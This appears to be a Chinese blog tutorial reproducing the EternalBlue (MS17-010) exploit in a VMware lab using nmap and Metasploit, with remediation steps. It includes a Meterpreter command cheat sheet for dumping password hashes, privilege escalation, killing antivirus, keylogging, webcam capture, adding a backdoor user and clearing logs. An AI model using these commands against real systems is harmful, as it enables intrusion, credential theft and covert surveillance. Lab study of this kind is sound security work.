ms17-010永恒之蓝漏洞复现
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
文章目录
- 前言
- 一、测试环境准备
- 1.安装VMware
- 2.安装攻击机(kali镜像)
- 1.安装靶机(win7)
- 二、测试前准备工作
- 三、开始测试
- 总结
- 修复方法
前言
学安先学法,禁止恶意攻击。该文章仅做学术交流使用,禁止恶意转载使用,本人不承担任何后果。
一、测试环境准备
1.安装VMware
so easy不做描述
2.安装攻击机(kali镜像)
使用清华的镜像。
so easy不做过多描述
1.安装靶机(win7)
同上
二、测试前准备工作
1、打开VMware,开启虚拟机kali与windows7。
2、查看靶机的ip地址,win+R开启命令行输入cmd并回车。开启的窗口里输入ipconfig。查看ipv4地址,我这里是192.168.41.146。
3、关闭防火墙
4、打开kali,ping一下靶机地址,能ping通则表示防火墙成功关闭。Ctrl+c取消操作。
三、开始测试
第一步:使用kali自带的nmap工具扫描靶机ip,查看是否存在445端口,状态是否正常开启。
第二步:开启matesploit。
第三步:寻找有关于永恒之蓝(ms17-010)的模块。
第四步:使用第3个模块,检索目标靶机是否存在永恒之蓝漏洞。出现下图字样即代表存在。这里需要设置检索的地址,其他选项会自动默认设置。
第五步:使用第0个模块,攻击目标靶机。这里需要设置payload,攻击的ip地址rhost,其他选项会自动默认设置。详细命令可查看总结。输入run或exploit开始攻击。
显示以下字样即为攻击成功。
成功后会显示meterpreter命令提示符,这里可以开展进一步的渗透工作,详细命令可查看总结。
总结
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。在kali中,自带了Metasploit工具。
永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
MSF后渗透命令:
切换到目标主机的windows shell:shell
从shell退出到meterpreter:exit
从meterpreter退出到MSF框架:background
查看获得的shell:sessions -l
切换到id为1的shell:sessions -i 1
进阶命令:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
run vnc #监控目标机桌面
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
clearev #清除日志
修复方法
(1)关闭445端口
1、win+r,打开regedit。
2、找到注册表项:
“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
新建一个值,32位或64位看自己选择,我选择的是QWORD。
3、重命名该值为SMBDeviceEnabled。
4、右击修改该值,将数值数据改为0,点击确定,关闭窗口。
5、win+r,打开services.msc。
6、找到server服务,双击进入管理控制页面。把这个服务的启动类型更改为“禁用”,服务状态更改为“停止”,最后点击应用即可。
7、重启电脑生效。
验证:
1、打开kali,ping一下靶机地址,可以ping通。(关闭了防火墙)
2、nmap扫描,没有发现445端口。
3、msf未检查到永恒之蓝漏洞。
(2)开启防火墙
(3)安装对应补丁
官网补丁地址:
点击直达https://support.microsoft.com/zh-cn/topic/microsoft-%E5%AE%89%E5%85%A8%E5%85%AC%E5%91%8A-4025685-%E5%8F%97%E6%94%AF%E6%8C%81%E5%B9%B3%E5%8F%B0%E6%8C%87%E5%AF%BC2017-%E5%B9%B4-6-%E6%9C%88-13-%E6%97%A5-d35efef9-190b-31f6-d155-b323eb76779f
这里我一直安装失败,没找到解决方案,不详细描述了。
欢迎交流,不定时持续更新。
ms17-010永恒之蓝漏洞复现相关推荐
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现
文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...
- MS17_010永恒之蓝漏洞复现
MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...
- metasploit中msfconsole使用教程,永恒之蓝漏洞复现
文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...
- Windows 7 ms17-010永恒之蓝漏洞复现
Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...
- 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
- 永恒之蓝漏洞复现(ms17-010)
文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...
- 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...
最新文章
- 局域网中架设Win 2003终端服务器
- Android系统中的任意文件读写方法
- The content of elements must consist of well-formed character data or markup
- Centos7 下定义MariaDB源Yum安装最新版本的MariaDB
- 记录一则expdp任务异常处理案例
- java的printf语法_Java中printf的用法总结
- 如何在柱状图中点连线_如何快速掌握MSA
- Opencv之Mat操作(重要)
- python工程师干什么的_Python就业前景和工资待遇分析,你学Python了吗?
- 拓端tecdat|R语言估计获胜概率:模拟分析学生多项选择考试通过概率可视化
- 图像分类模型AlexNet解读
- 百年GE濒临破产,传奇霸业何以衰亡?
- MDK KEIL 下载算法程序 外部存储QSPI FLASH
- 忆典s1Android,忆典S1四核(RK3128)官方固件+安卓4.4.4已Root权限精简固件+刷机教程
- QQ连连看外挂源代码
- TYPE-C HUB(拓展坞)乐得瑞LDR6023A快充方案介绍
- 机器学习常用的五种预测结果评价
- 超全的AI人工智能学习路线图(内含大纲+视频+工具)
- 不用写软件,纯JS 实现QQ空间自动点赞
- 为什么win10默认浏览器更改不了已解决